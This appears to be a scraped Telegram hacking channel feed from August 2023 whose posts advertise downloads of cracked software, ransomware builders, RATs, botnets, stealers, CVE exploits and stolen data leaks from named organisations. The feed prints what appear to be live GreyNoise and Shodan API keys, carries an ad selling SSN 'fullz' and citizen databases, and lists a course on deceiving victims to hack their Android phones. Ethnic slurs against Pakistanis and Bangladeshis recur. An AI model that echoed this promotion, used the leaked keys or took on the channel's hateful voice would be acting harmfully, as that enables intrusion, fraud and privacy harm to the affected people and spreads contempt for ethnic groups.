🪅ReadyAPI v3.47.0 Crack : Download📍CVE-2021-21972 Vcenter Exploitation Toolkit : Download🧮LanSweeper Licensed : Download🖨Postel – S.P.A Data Leak : Download🪬EternalHush Advance C2 Framework : Download📯Tomsk State University’s Main System Source Code : Download👾Capital Television Belarus Data Leak : Download🕸CVE-2023-27163-InternalProber : Download
2023-09-01 01:16:14
CrackCodes 🇮🇳 pinned «👾GX40 Ransomware Builder : Download 📟RogueSliver - C2 Framework : Download 📯HookBot Android Malware Leak : Download 🪬SQL-Login-Bypass Script : Download 📍Anti-kill PHP Trojan Generator : Download 🕸Nvidia Corporation Leak : Download 🐲CVE-2023-35078 Exploit…»
2023-08-31 17:35:05
2023-08-31 15:22:35 #cybersecurity
2023-08-31 06:39:17
👾GX40 Ransomware Builder : Download📟RogueSliver - C2 Framework : Download📯HookBot Android Malware Leak : Download🪬SQL-Login-Bypass Script : Download📍Anti-kill PHP Trojan Generator : Download🕸Nvidia Corporation Leak : Download🐲CVE-2023-35078 Exploit : Download99 Cents Only Stores Data Leak : Download
2023-08-31 05:41:15
𝗢𝗻𝗲𝗹𝗶𝗻𝗲𝗿 𝗳𝗼𝗿 𝗙𝘂𝘇𝘇𝗶𝗻𝗴 𝗛𝗼𝘀𝘁-𝗛𝗲𝗮𝗱𝗲𝗿 🔥😎𝗟𝗶𝗻𝗸:
2023-08-30 11:16:11
🟩Hacking and Coding Practice Apps🔥❤️‍🔥HACKER X❤️‍🔥Kali Linux Guide❤️‍🔥Hacking Exams❤️‍🔥Coding Practice❤️‍🔥Learn EH❤️‍🔥Hacking Content❤️‍🔥Mitnick Tips❤️‍🔥Linux Commands❤️‍🔥Nmap Guide❤️‍🔥Learn Docker❤️‍🔥Learn Powershell❤️‍🔥TopHacking Guide❤️‍🔥Metasploit Guide❤️‍🔥Termux Guide❤️‍🔥Wireshark Guide✔️Share with Your Friends.
2023-08-30 09:11:25
Pakistan ki 😁😁
2023-08-30 09:08:51
2023-08-30 07:04:09
Why Poland is terrorism Free?
2023-08-30 04:04:51
🪬🤖HUMAN GENERATOR Online :📌CB Group Australia Data Leak :📟Eureka Casino USA Data Leak :📍KRBJack – Kerberos AP-REQ Hijacking Tool :👾DebugAmsi – Bypass AMSI :
2023-08-29 16:58:04
gg's hacker's ( I love you —❤️ ‼️Here we go again here we go again 🎉GreyNoise Enterprise API ( got it from my friend (api_key='i9V1X0sGCeUxw53Toucs5z7bawFRU83uOQGFvI5sTDiMM41TKcHtCxe1f6UgSeyi')Note:- this api key work at this movement and as always #hacker_bano_chutiya_nhe 👁️
2023-08-29 16:34:33
gg's hacker's ( I love you —❤️ ‼️Here we go again CVE-2023-38388Mass Exploit - CVE-2023-38389 < Wordpress < JupiterX Core < Unauthenticated Account TakeoverDork : inurl: wp-content/plugins/jupiterx-core/POC exploit and as always #hacker_bano_chutiya_nhe 😍😍
2023-08-29 04:55:52
🪅MIDHCO Data Leak :📟NtRemoteLoad – Remote Shellcode Injector :🐀TelegramRAT :🧮CVE-2023-38831 Winrar Exploit Generator :👾CVE-2023-39063 Poc :🪬JupiterX Core Premium Plugin Mass Exploit – CVE-2023-38388 :📯JDK CVE-2023-21939 POC :
2023-08-29 04:38:07𝗥𝗲𝗲𝗹 𝗼𝗻 𝗦𝗦𝗥𝗙✨
2023-08-28 15:58:28
Warning ⚠️⚠️⚠️⚠️This content might not be suitable for some viewers
2023-08-28 05:33:18
🪅MIDHCO Data Leak :📟NtRemoteLoad – Remote Shellcode Injector :🐀TelegramRAT :🧮CVE-2023-38831 Winrar Exploit Generator :👾CVE-2023-39063 Poc :🪬JupiterX Core Premium Plugin Mass Exploit – CVE-2023-38388 :📯JDK CVE-2023-21939 POC :
2023-08-28 01:01:49
2023-08-27 17:08:41
🍓 Python Certifications to boost your resume in 2023 🍓𝟭. 𝗜𝗻𝘁𝗿𝗼 𝘁𝗼 𝗣𝘆𝘁𝗵𝗼𝗻This a great course to get started with learning Python, if you have no coding experience.👉𝟮. 𝗣𝘆𝘁𝗵𝗼𝗻 𝗣𝗿𝗼𝗴𝗿𝗮𝗺𝗺𝗶𝗻𝗴 𝗰𝗼𝘂𝗿𝘀𝗲Learn the fundamentals like functions, loops, conditional statements, etc of the most important language for data science.👉𝟯. 𝗣𝗿𝗼𝗴𝗿𝗮𝗺𝗺𝗶𝗻𝗴 𝗘𝘀𝘀𝗲𝗻𝘁𝗶𝗮𝗹𝘀 𝗶𝗻 𝗣𝘆𝘁𝗵𝗼𝗻Part 1 prepares you for PCEP – Certified Entry-Level Python Programmer Certification.Part 2 prepares you for PCAP – Certified Associate in Python Programming Certification.👉𝟰. Python Data Structure and Algorithms👉𝟱. 𝗦𝗰𝗶𝗲𝗻𝘁𝗶𝗳𝗶𝗰 𝗖𝗼𝗺𝗽𝘂𝘁𝗶𝗻𝗴 𝘄𝗶𝘁𝗵 𝗣𝘆𝘁𝗵𝗼𝗻You'll learn Python fundamentals like variables, loops, conditionals, and functions. Then you'll quickly ramp up to complex data structures, networking, relational databases, and data visualization.👉
2023-08-27 17:02:55
Any one have edu mail trick ? bhut aavshyakta h help ( thanks
2023-08-27 16:59:48
2023-08-27 12:48:44
2023-08-27 08:44:37
CrackCodes 🇮🇳 pinned «📌📍Craxs Rat v5.1 + Loader : 🔰⚡US Military Contractor And Puerto Rican Reserve Files Leak : 👾💩Islamic Reminder Data Leak : https:…»
2023-08-27 05:16:41
📌📍Craxs Rat v5.1 + Loader :🔰⚡US Military Contractor And Puerto Rican Reserve Files Leak :👾💩Islamic Reminder Data Leak :☣️🌪️Bangladeshi Police Files Leak :📟🧮TBBRAT – Power Full BotNet :👾⚡Virus Maker Pack (Simp) :📟CVE-2023-27163 Mailtrail Exploit :
2023-08-26 14:42:57
Advance Attacks.zipLevel: Medium1 - Introduction2 - Methodology and Context3 - File Inclusion4 - SQL Injection5 - NoSQL Injection6 - XSS and XSRF TogetherDownload:
2023-08-26 14:19:14
📌Architectural Film Design Data Leak :👾ZBOT-Botnet :🪅JsFinder Pro Tool :📟Micr0 shell – Dynamically Generates Windows X64 PIC Null-Free Reverse Shell :
2023-08-26 13:31:46
2023-08-25 12:51:45
CrackCodes 🇮🇳 pinned «📌Cyberphoto AB Data Leak : 💩Portal Danish House Students Home Malaysia Leak : 🐸Duolingo 2023 Data Leak :…»
2023-08-25 12:50:12
📌Cyberphoto AB Data Leak :💩Portal Danish House Students Home Malaysia Leak :🐸Duolingo 2023 Data Leak :🪅CVE-2023-38035 POC :🧮CVE-2023-26256 POC :
2023-08-25 12:00:40
🤩 Some Pentesting Tools list 🤩hydra Apktool Injector JSON Web Token Toolkit
2023-08-25 05:05:51
𝗕𝘂𝗴: 𝗥𝗲𝗳𝗹𝗲𝗰𝘁𝗲𝗱 𝗫𝗦𝗦🔥𝗟𝗶𝗻𝗸:
2023-08-25 03:33:25
👾HookBot Android Malware Leak :🔰CVE-2023-3079 Exploit :💥Smoothie King Data Leak :⚡Padna Compressor Company Data Leak :
2023-08-24 11:25:16
CrackCodes 🇮🇳 pinned «📌Hackers CVE-2023 : 📟Dream qBot Botnet Source Code + Tutorial : 👾All Shell Backdoor List In The World + Download :…»
2023-08-24 05:36:48
Free labs to train your skills in pentesting/CTF and Computer Science Skills.Best wishes for successful education!!-> Try Hack Me> Attack-Defense> alert to win> CMD Challenge> Exploration Education> Google CTF> HackTheBox> Defendtheweb> Hacksplaining> Hacker101> Hacker Security> Hacking-Lab> HSTRIKE> ImmersiveLabs> NewbieContest> OverTheWire> Practical Pentest Labs> Pentestlab> Penetration Testing Practice Labs> PentestIT LAB> PicoCTF> PWNABLE> Root-Me> SANS Challenger> SmashTheStack> The Cryptopals Crypto Challenges> Vulnhub> W3Challs> WeChall> HackerRank> kaggle> Zenk-Security
2023-08-24 05:05:39
📌Hackers CVE-2023 :📟Dream qBot Botnet Source Code + Tutorial :👾All Shell Backdoor List In The World + Download :🪅EUROINS Russia Data Leak :📍Faronics DeepFreeze 8 Exploit :
2023-08-23 13:36:52
तब 🇮🇳देता ना दशमलव भारत तो यूँ चाँद पे जाना मुश्किल था धरती और चाँद की दूरी का अंदाज़ा लगाना मुश्किल था अब 🇮🇳ISRO के हैं वैज्ञानिक तो, तो चाँद पे जाना मुमकिन है। चाँद के दक्षिण कोने पर, तिरंगा होना मुमकिन है। #chandrayan3🇮🇳
2023-08-23 12:51:56
CrackCodes 🇮🇳 pinned a photo
2023-08-23 12:43:10
The Two Robots, from a Mission named Chandrayaan-3, make India the first country 🇮🇳 to ever reach this part of the lunar surface in one piece — and only the fourth country ever to land on the moon.Jai Hind, Jai Bharat 🇮🇳
2023-08-23 11:17:16
CrackCodes 🇮🇳 pinned « 🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳»
2023-08-23 11:16:18 🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳
2023-08-23 11:15:22
Chandrayaan-3 Mission:All set to initiate the Automatic Landing Sequence (ALS). Awaiting the arrival of Lander Module (LM) at the designated point, around 17:44 Hrs. IST. Upon receiving the ALS command, the LM activates the throttleable engines for powered descent. The mission operations team will keep confirming the sequential execution of commands.The live telecast of operations at MOX begins at 17:20 Hrs. #ISRO #CH3
2023-08-23 07:44:56
2023-08-23 02:57:46
🔰Untun - Tunnel Your Local HTTP(s) Server To The World :👀Eyes - OSINT Tool To Get Existing Accounts From An Email :🧑‍🎓Cetus Legal NZ Data Leak :🔥Openfire CVE-2023-32315 Exploit :⛹️ Turkey Sports Data Leak :🧑‍💻Protemps Employment Services Pte Ltd Data Leak :💩Institute of Space Technology (IST) Porkistan Data Leak :
2023-08-22 16:06:32
2023-08-22 04:41:05
Active Directory Enumeration: Everything You Need To Know
2023-08-22 02:10:39
📌Ministry of Justice (Italy) Data Leak :📟CVE-2023-36874 PoC :👾HITCON 2023 CVE-2023-20562 POC :🧮 Data Leak :
2023-08-21 19:57:15
2023-08-21 16:35:07
🔰⭐Sunrise CBD Leak: ⚡💥CVE-2023-29298 Adobe Poc:🌪️⚡PS5 Kernel Exploit:☣️Anti-kill PHP Trojan Generator : | |
2023-08-21 09:19:32
CrackCodes 🇮🇳 pinned «📌Pestudio-pro 9.54 : 👾Chrome-extention stealer V2 : 📟5xDDoS v2.3 : 🧮American Kennel Club (AKC) Data Leak : https:…»
2023-08-21 04:47:50
𝗦𝗦𝗥𝗙 𝗘𝘅𝗽𝗹𝗮𝗶𝗻𝗲𝗱... 𝗧𝗼𝗽𝗶𝗰𝘀 𝗖𝗼𝘃𝗲𝗿𝗲𝗱:1. What is SSRF? 2. Types of SSRF 🤔3. SSRF Alternative 😨In this video we've Explain 𝗵𝗼𝘄 𝘁𝗼 𝗲𝘀𝗰𝗮𝗹𝗮𝘁𝗲 𝗳𝗿𝗼𝗺 𝗦𝗦𝗥𝗙 𝘁𝗼 𝗥𝗖𝗘 🔥Please Share your Views & Like & Subscribe to our YouTube channel, for More interesting Video. 🙏🏻𝗟𝗶𝗻𝗸:
2023-08-21 03:05:29
📌Pestudio-pro 9.54 :👾Chrome-extention stealer V2 :📟5xDDoS v2.3 :🧮American Kennel Club (AKC) Data Leak :🪅Alaan TV Data Leak :🤖FaceChain – Generating Your Digital-Twin :
2023-08-20 16:59:33
Expired links are updated now 👾
2023-08-20 16:46:55
👾HookBot Android Malware Leak :🔰CVE-2023-3079 Exploit :💥Smoothie King Data Leak :⚡Padna Compressor Company Data Leak :
2023-08-20 12:51:08
😈🍹sector Database🍹😈😈 Sector always sector 😈😈Deep web dark web leaker😈😈 Phone number Database. 😈 Mail Database. 😈 Citizens Database. 😈 Passport Database. 😈 Consumer Database. 😈 France Database.😈 Belgium Database.😈 Italy Database.😈 Iran Database.😈 B2B Database. 😈 Germany Database.😈 Swiss Database.😈 Poland Database.😈 Vietnam Database.😈 Sweden Database.😈 Africa Database😈 Usa Database.😈 China database 😈 Spain Database.😈 Sweden Database.😈 Greece Database.😈 Netherland Database.😈 Colombia Database😈 Usa SSN + Fullz Database😈 484 Big COMPANY Database. 😈 Ukraine Database.😈 India Database😈 Bank database 😈 Unlimited logs private 😈 Australia, china, rassia, etc (golden nearly all countries database) Free data👇@private_sector_info
2023-08-19 17:09:05
Learn Web development for Free📍1. HTMLw3schools.com2. JavaScriptjavascript.info4. Git & GitHubgit-scm.com5. APIblog.postman.com6. Pythonlearnpython.org7. SQLSQLbolt.com8. Reactreact-tutorial.app9. Web3learnweb3.io10.▪️Share & Support us▪️
2023-08-19 16:05:02
🔰👾CVE-2023-3460 - Unauthorized admin access for Ultimate Member plugin POC :🌪️💥SQLiv - Massive SQL Injection Scanner Tool :☣️🌪️Globant Argentina IT Company leak :⭐🔰Equipo_io Data Leak :⚡🌪️550k Thailand ID-Card Data ! | 2023 :⭐👾Sanmina Corporation Leak : | |
2023-08-19 05:06:08
2023-08-19 03:06:12
📌Noir – Attack Surface Detector Form Source Code :📟Simple-XSS – Multiplatform Cross-Site Scripting (XSS) Vulnerability Exploitation Tool :🧮Eatwallet Data Leak :🪅Ministry of Energy and Mineral Resources Indonesia Data Leak :👾The Emerson School District Data Leak : | |
2023-08-19 00:42:54
CrackCodes 🇮🇳 pinned «👾HookBot Android Malware Leak : 🔰CVE-2023-3079 Exploit : 💥Smoothie King Data Leak : ⚡Padna Compressor Company Data…»
2023-08-18 18:01:59
🔥 PAID : 𝖥𝗋𝖾𝖾𝗅𝖺𝗇𝖼𝗂𝗇𝗀 𝖺𝗇𝖽 𝖣𝗂𝗀𝗂𝗍𝖺𝗅 𝖬𝖺𝗋𝗄𝖾𝗍𝗂𝗇𝗀 𝖢𝗈𝗎𝗋𝗌𝖾𝗌  🔥30+ Recorded video Course𝐇𝐢𝐠𝐡𝐥𝐢𝐠𝐡𝐭𝐞𝐝 𝐂𝐨𝐮𝐫𝐬𝐞𝐬 : Social Media Marketing Course WordPress Development Course Android App Development Course Facebook Ads Course Search Engine Optimization Course Email Marketing Course Google Ads Course YouTube Domination Course Amazon Business Course Fiverr Freelancing Course Content Writing Course Graphic Designing Course Video Editing Course Ecommerce Business Course Dropshipping CourseFacebook Adbreaks Cours.E-Commerce Business CourseShopify CourseWeb Development & Design.And Many More#on_demand🔗 Link :✅ ꜰɪʟᴇ ᴘᴀꜱꜱᴡᴏʀᴅ : hackinsider
2023-08-18 17:55:25
Bangladesh leaked DB● FEEL THE POWER OF ( < ֆɨʟɛռȶ օռɛ > )
2023-08-18 16:46:27
👾HookBot Android Malware Leak :🔰CVE-2023-3079 Exploit :💥Smoothie King Data Leak :⚡Padna Compressor Company Data Leak :
2023-08-18 13:22:05
भारत 🇮🇳हिंदुस्तान जिंदाबाद 🚩धन्य: अस्मि भारतत्वेन ❤️
2023-08-18 09:24:47
2023-08-18 09:23:11
2023-08-18 06:21:16
Hacking Android & Social Engineering Complete CourseLanguage: HindiTopics:1: Aiming & Analyzing The Victim2: Getting The Technical Details3: How To Convince Your Victim4: Choosing Your Weapon5: How To Get 12 Free Trail On Aws6: How To Make An Rdp And Enable Port Forwarding (aws)7: How to make a linode account and get 100$ Free credits8: Install Windows Rdp On Your Linode Vps (2022 Server/ Windows 11)9: Setting Up Rat & Building The Payload10: Bypass Payload From Google Play Protect11: 3 Methods To Host (Upload) & Share Your Payload12: Setting Up Instagram Malware Download Page (Social Engineering Tactic)13: Mask Your Url To Play With Victim (Social Engineering Tactic)14: Using The Rat & Hacking The Android ( Final Card)15: How To Hack Whatsapp After Getting Access16: How To Hack Facebook After Getting AccessCredit :- @TheGodEye✅️💡
2023-08-17 14:47:50
👾Markdown Monster Enterprise Crack :💩Coxsbazar Police Bangladesh Data Leak :📟BurpCopilot – AI-Based BurpSuite Vulnerability Analysis Plugin :📟RDP Credential Stealer :📌Lucky.Net Admmail Leak : | |
2023-08-17 09:05:53
⚡️ Worth $100K Ethical Hacking Complete Course ⚡️Introduction To FootprintingGet Information From Website NameHow To Collect Information Using E-mailInformation Collection Using NetworkInformation Gathering Using Search EngineDeep learn Of Footprinting (conclusion)How To Disable Httrack & Web MirroringCompletely Hide Your Personl Details From InternetPractical Of Ip Address And Local HostIntroduction To Ip AddresVirtual Lab SettingIntroduction To ProxyHow To Use Tor BrowserHow To Use Multiple ProxiesHow To Use Free Proxy ServerWhat Is ScanningLINK :
2023-08-17 06:42:57
API Cheatsheet.pdf
2023-08-17 04:57:47
𝗧𝗿𝗶𝗰𝗸𝘆 𝗔𝗦𝗣 𝗯𝗹𝗶𝗻𝗱 𝗦𝗤𝗟 𝗜𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 𝗶𝗻 𝗮 𝗟𝗼𝗴𝗶𝗻 𝗽𝗮𝗴𝗲.
2023-08-16 18:30:26 Kangladeshi Cyber Experts Plz Find The Rootkit Here Now it is Useless to Us
2023-08-16 17:19:16
2023-08-16 16:48:38
2023-08-16 15:20:23 Cyber Experts Plz Find The Rootkit Here Now it is Useless for Us
2023-08-16 14:13:21 SKIDS
2023-08-16 09:26:11
🚨 Alarming situation in Faisalabad Christian community under attack, genocide is imminent ‼️ Today Muslim mob burned 3 churches already. Mob is heading to the 4th church in Faisalabad.Several Christian homes, properties and churches have been burned down.Thousands of Muslims in Pakistan have gone on a rampage in Faisalabad.Christian genocide is imminent.
2023-08-16 05:33:55
𝟳𝟬𝟬$ 𝗕𝗼𝘂𝗻𝘁𝘆 𝗳𝗼𝗿 𝗦𝘁𝗼𝗿𝗲𝗱 𝗫𝗦𝗦 🤑𝗩𝗶𝗱𝗲𝗼 𝗣𝗼𝗖:
2023-08-16 05:06:43 ❤️ JAY SHREE RAAM ❤️
2023-08-16 03:00:34
📟Ghostscript Command Injection CVE-2023-36664 Exploit :🖨WPS Office Rce POC :💩Employers’ Federation of Pakistan (EFP) Data Leak :
2023-08-15 15:38:54
CrackCodes 🇮🇳 pinned a photo
2023-08-15 14:50:33
2023-08-15 14:41:32
Should we stop this ??? , our childrens PORKISTAN and KANGLADESH are screaming 😄
2023-08-15 14:41:31
2023-08-15 14:41:30
2023-08-15 05:43:54
𝗖𝘆𝗯𝗲𝗿𝘁𝗶𝘅 𝗪𝗶𝘀𝗵𝗶𝗻𝗴 𝘆𝗼𝘂 𝗮 𝗛𝗮𝗽𝗽𝘆 𝗜𝗻𝗱𝗲𝗽𝗲𝗻𝗱𝗲𝗻𝗰𝗲 𝗗𝗮𝘆. 🇮🇳 ✨We are Indian Start-up where we Provide Security Services, Development service & many moreCybertix is very Proud to be an Indian Start-up Company 🇮🇳Jai Hind 🇮🇳 Vande Mataram 🇮🇳
2023-08-15 01:14:45
In a Pride for Bharat🇮🇳 and humiliation to Pakistan🇵🇰, Burj Khalifa celebrates Bharat's Independence Day.
2023-08-14 18:50:23
2023-08-14 18:50:22
Happy Independence Day 🇮🇳
2023-08-14 18:34:55🇮🇳 Happy Independence Day 🇮🇳जय हिन्द 🇮🇳 जय भारत 🇮🇳
2023-08-14 06:17:22
World record Prank ho gaya DUBAI meh !!!
2023-08-14 05:47:22
𝗖𝗼𝗺𝗺𝗮𝗻𝗱 𝗜𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻. 𝗧𝗼𝗽𝗶𝗰𝘀 𝗖𝗼𝘃𝗲𝗿𝗲𝗱:1. What is Command Injection? 2.Blind Command Injection😳3. Tools to Find Command Injection. 4. Detection & Exploitation Payloads given in Description. 𝗣𝗹𝗲𝗮𝘀𝗲 𝘀𝗵𝗮𝗿𝗲 𝘆𝗼𝘂𝗿 𝗩𝗶𝗲𝘄𝘀 🙏🏻😊𝗟𝗶𝗻𝗸:
2023-08-14 01:55:56
📌St Landry Parish School Board Data Leak :📟CVE-2023-27163 Mailtrail Exploit :👾SentinelOne Agent :
2023-08-13 05:14:52
⚡💥Pisshoff - Fully Isolated Honeypot ssh Server :🌪️Ingram - Webcam Vulnerability Scanning Tool :👾⚡Virus Maker Pack (Simp) :🍺Zarah Wine Data Leak :🔰💥DSR Corporation Data Leak :
2023-08-12 16:22:01 us at Instagram For such amazing posts
2023-08-12 16:11:01
🧮📌Ekohesap Information Technologies Inc Turkey Leak :📍📍NetRadar :🖨🪅Granada Energy Corporation Data Leak :📟📌Ad-Link-Bypasser-Bot : 📟🧮TBBRAT – Power Full BotNet : 🪅📍Cortex XSOAR 6.11 Enterprise : | |
2023-08-12 05:37:46
2023-08-12 04:27:34
🔰☣️VED-eBPF - Kernel Exploit and Rootkit Detection :👾⚡Bashfuscator :🌪️CDEK Company Data Leak :
2023-08-11 14:23:00
🔰⚡US Military Contractor And Puerto Rican Reserve Files Leak :👾💩Islamic Reminder Data Leak :☣️🌪️Bangladeshi Police Files Leak : | |
2023-08-11 11:17:38
SHODAN keys OefcMxcunkm72Po71vVtX8zUN57vQtACPSKINdQe1GyxGgecYz2191H2JoS9qvgDpHHlgpFt8Ka3Stb5UlTxcaEwciOeF2QM61TvA2dNwxNxmWziZxKzR5aO9tFD00NjxTbXXOSBr0R65OcClImSwzadExoXU4tcEJV3A4Mka2wPs7P8VBCO6xcpRe27iNJumEuInz8UH1ixLGJq4oQhEiJORERVG5xclkY0ng0XMo29zEhzyw3ibQfeEBxghwPFsyeCnFndQ8TE4qAGvhm9nZLBZOBgoLKd7TeyFZ8oyLulHwYUOcSPzZ5w3cLYib61v4YpsPUJ3wjDxEqywwu6aF5OZKWj8kikdTNGRiwYNozXIDRf5DWyGNbkdiS5m3JKkdnzf4fsYWQmGajRDn3hB0RElbUlIaquboYedPn8iDWi6GDSO6h2kz72VLt6bZ3SFQNAMUdkeqXqVOdXsTLYeatFSpZSktdbOygcaGSSq46Lg5fZiADAuFxl4OBbn7zmXAbsu1Ruj5uhTNcxGdbGNgrh9WuMS1B6nkGd8uVE4oryfUVvioprswdKGmA5InzZXYdjHDeJM36AjDfU1feBsyMJIj8XxGzDEBeU0lGqtIO6yCxVFCWC4nUVbvovtjo5
2023-08-11 01:59:18
📌📍Jonas Photo Indonesia Leak :📟Angkasa MALAYSIAN Data Leak :👾👾Titan Stealer Source Code :🖨Sudomy – Subdomain Enumeration & Analysis Tool : 👾🖨Scan4All – Vuls Scanner 15000+PoCs :🪅NgelistMoment – Domain Grabber :🧮CVE-2023-30533 POC : | |
2023-08-10 14:56:58
2023-08-10 06:37:12
𝙐𝙣𝙞𝙘𝙤𝙙𝙚 𝙓𝙎𝙎 𝙋𝙖𝙮𝙡𝙤𝙖𝙙 ✨𝙇𝙞𝙣𝙠:
2023-08-10 05:29:32 a look at this
2023-08-10 02:27:56
👾WordPress AN_Gradebook SQL Injection Exploit :🌚Billarnetshop Data Leak :📟httptoolkit-android :
2023-08-09 17:32:53
🔰⚡TP-Link TL-WR840N Stack Buffer Overflow DoS POC :💥☣️Apple Safari Integer Overflow POC :💥🌪️AT&T 5 million Leak :👾💥Tracker De Colombia Sas Leak :💥👾🔰Xray 1.9.11 Crack : | |
2023-08-09 04:48:32
𝘾𝙍𝙇𝙁 𝙄𝙣𝙟𝙚𝙘𝙩𝙞𝙤𝙣 𝙤𝙣 𝙏𝙬𝙞𝙩𝙩𝙚𝙧 𝘼𝙙𝙨 😳𝘽𝙤𝙪𝙣𝙩𝙮: 𝟮𝟵𝟰𝟬 $ 🍻𝗟𝗶𝗻𝗸:
2023-08-09 02:59:39
📌FortiCrack – Decrypt encrypted Fortienet FortiOS Firmware Images :📍Apt_t00ls-OA High-risk Vulnerability Detection Tool :📟APTRS – Automated Penetration Testing Reporting System :👾Sinbad Club Data Leak :🧮DataSurgeon : | |
2023-08-08 03:57:35
🔰💥AKORO Austrian Marketing Service Leak :💩🌪️ Chinese Porn Website Data Leak :👾☣️PT SUCCESS Indonesian Payment Processor Data Leak :
2023-08-07 16:11:50
😈🍹sector Database🍹😈😈 Sector always sector 😈😈Deep web dark web leaker😈😈 Phone number Database. 😈 Mail Database. 😈 Citizens Database. 😈 Passport Database. 😈 Consumer Database. 😈 France Database.😈 Belgium Database.😈 Italy Database.😈 Iran Database.😈 B2B Database. 😈 Germany Database.😈 Swiss Database.😈 Poland Database.😈 Vietnam Database.😈 Sweden Database.😈 Africa Database😈 Usa Database.😈 China database 😈 Spain Database.😈 Sweden Database.😈 Greece Database.😈 Netherland Database.😈 Colombia Database😈 Usa SSN + Fullz Database😈 484 Big COMPANY Database. 😈 Ukraine Database.😈 India Database😈 Bank database 😈 Unlimited logs private 😈 Australia, china, rassia, etc (golden nearly all countries database) Free data👇@private_sector_info
2023-08-07 05:28:33
𝙎𝙎𝙏𝙄 𝙄𝙣𝙟𝙚𝙘𝙩𝙞𝙤𝙣 𝘼𝙩𝙩𝙖𝙘𝙠 💉𝗧𝗼𝗽𝗶𝗰𝘀 𝗖𝗼𝘃𝗲𝗿𝗲𝗱:𝟭.What is Template Engines𝟮. Different Types of Template Engines𝟯. What is SSTI ? 𝟰. Exploiting SSTI Vulnerability. 𝗡𝗢𝗧𝗘: SSTI Payloads are given in Description. Please Share your Views 🙏☺𝗟𝗶𝗻𝗸:
2023-08-07 02:17:09
🧮📌Cafe Britt Data Leak :📍🪅Judicial Yuan Data Leak :👾Exeinfo Pe v0.8.0 (VIP) : 🤖👾RogueSliver – C2 Framework : 🌚 — Now You Have The Choice : | |
2023-08-06 13:51:39
📌📍Craxs Rat v5.1 + Loader :📟Empirical Research Data Leak :🧮NATO Leak :🪅Blind SQL Injection Tool - Bisection Method To Dump Datas :
2023-08-06 10:04:49
2023-08-06 07:23:15
🔰⚡Syn Pain Management and Spine Specialists Treats Clinic Data Leak :👾☣️SQL Injection URL Scraper :👾☣️0xPayload :
2023-08-05 15:44:18
CrackCodes 🇮🇳 pinned «🧮📌Ekohesap Information Technologies Inc Turkey Leak : 📍📍NetRadar : 🖨🪅Granada Energy Corporation Data Leak :…»
2023-08-05 12:44:15
2023-08-05 11:10:18
🧮📌Ekohesap Information Technologies Inc Turkey Leak :📍📍NetRadar :🖨🪅Granada Energy Corporation Data Leak :📟📌Ad-Link-Bypasser-Bot : 📟🧮TBBRAT – Power Full BotNet : 🪅📍Cortex XSOAR 6.11 Enterprise : | |
2023-08-04 14:47:35
CrackCodes 🇮🇳 pinned «📌📍Craxs Rat v5.1 + Loader : 📟Empirical Research Data Leak : 🧮NATO Leak : 🪅Blind SQL Injection Tool - Bisection Method To Dump…»
2023-08-04 02:06:11
📌📍Craxs Rat v5.1 + Loader :📟Empirical Research Data Leak :🧮NATO Leak :🪅Blind SQL Injection Tool - Bisection Method To Dump Datas :
2023-08-03 11:33:06
2023-08-03 10:32:14
📌📟CVE-2023-37979 Ninja-Forms Exploit :🧮LFI FINDER TOOL :📍🪅Gamigo Data Leak : | |
2023-08-03 07:41:31
Add this Regex in your Burpsuite to Filter out Potential Parameters. 🔥𝙇𝙞𝙣𝙠:
2023-08-03 02:26:17
🔰⚡US Military Contractor And Puerto Rican Reserve Files Leak :👾💩Islamic Reminder Data Leak :☣️🌪️Bangladeshi Police Files Leak : | |
2023-08-02 14:28:19
📍📌AdventNet ManageEngine ADAudit Plus :📟🧮Bank Commonwealth Leak :🪅📌xorshell – Encoder PHP webshell to bypass WAF : | |
2023-08-02 12:24:47 us guys for amazing posts on OSINT.
2023-08-02 08:25:55
1120 $ 𝘽𝙤𝙪𝙣𝙩𝙮 𝙤𝙣𝙡𝙮 𝙛𝙤𝙧 𝘾𝙡𝙞𝙘𝙠𝙅𝙖𝙘𝙠𝙞𝙣𝙜 𝙑𝙪𝙡𝙣𝙚𝙧𝙖𝙗𝙞𝙡𝙞𝙩𝙮😨🔥It was reported in Twitter acquired domain. 𝙑𝙞𝙙𝙚𝙤 𝙋𝙤𝘾:
2023-08-01 13:12:31
📌📍Avatier Develops Software Data Leak :🧮ManageEngine Endpoint Central Enterprise :🪅📟GulagScanner – CloudFlare DNS Bypass & Analyzer :🖨Nesca 4 – Multi-Threaded Port Scanner : | |
2023-08-01 07:43:08
Deep web dark web database leaker join and enjoy @private_sector_info
2023-07-31 15:55:06
CrackCodes 🇮🇳 pinned «📌Xplain AG | Data Leak : 📟CVE-2023-24489 Exploiter [ShareFile RCE] : 🪅RealChar. – Your Realtime AI Character :…»
2023-07-31 15:25:55
25 HTB 1 Year Voucher Free|<
2023-07-31 11:56:25
2023-07-31 11:41:09
Hi, man.I'm also security expert specialize web/servers/reverse.So I have issue with patching bootloaders SoC......Becouse:*) This devices have no buttons for fastboot*) Every test image solution writing to the NAND via jtag (chip desoldering/rebolling)*) Not fully figured out how to run the bootloader in the Unicorn-Engine*) We have not runtime logs like i2c/uart debug*) Image have hw_boot(a/b) and boot(a/b). It's difficult for me *) Boot image have not ramdisc_____Probably solution (dirty mode)*) Inject in bootloader asm loop in other places to detect avb and ohers verification places and just patch via jmp*) Compile own bootloader via Das is U-BootSo. I will be glad if You advise maybe better solution.Welcome in my half-public as admin
2023-07-31 11:28:41
📌Xplain AG | Data Leak :📟CVE-2023-24489 Exploiter [ShareFile RCE] :🪅RealChar. – Your Realtime AI Character : | |
2023-07-31 08:26:27
Awesome Browser Extensions for OSINT by @osintambition A collection of awesome browser extension useful for OSINT along with their use case. #SOCINT #Intelligence #OSINTforGood #opensourceIntelligence #Cybersec #infosec #Recon
2023-07-31 08:26:26
Best Tools Collection for Social Media OSINT (SOCINT) @osintambition for more amazing content like this.#Cybersecurity #Infosec #OSINT #SOCINT #HUMINT #Cybercrimes #OnineInvestigations #socialMedia #facebook #Instagram #Linkedin #Github #Reddit
2023-07-31 06:21:45
OTP Bypass
2023-07-31 05:06:12
